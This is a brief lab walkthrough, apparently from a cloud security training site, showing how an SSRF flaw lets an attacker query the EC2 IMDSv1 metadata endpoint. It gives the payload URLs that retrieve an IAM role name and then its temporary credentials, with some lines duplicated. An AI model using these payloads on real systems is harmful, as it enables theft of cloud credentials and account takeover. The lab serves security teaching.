Abusing SSRF to Access EC2 Instance Metadata (IMDSv1) and Steal IAM Role Credentials

In this scenario, we simulate an attack on an EC2 instance that has IMDSv1 enabled and a role with write-level privileges attached. The instance also hosts a web application vulnerable to Server-Side Request Forgery (SSRF). An attacker leverages the SSRF vulnerability to access the IMDSv1 metadata endpoint, retrieves temporary security credentials associated with the attached IAM role, and uses them to gain write access to AWS resources within the account.

1. Access the SSRF-vulnerable web application

https://lab.5minutescloud.com/attack-path/aws/imdsv1-ssrf

https://lab.5minutescloud.com/attack-path/aws/imdsv1-ssrf

2. Enter the following payload to fetch the IAM role name, which will be further used to get Programmatic credentials.

http://169.254.169.254/latest/meta-data/iam/security-credentials/

http://169.254.169.254/latest/meta-data/iam/security-credentials/

3. Since we have the role name as AdministratorAccessRoleForEC2 , Let’s fetch the credentials by using the following payload.

http://169.254.169.254/latest/meta-data/iam/security-credentials/AdministratorAccessRoleForEC2

http://169.254.169.254/latest/meta-data/iam/security-credentials/AdministratorAccessRoleForEC2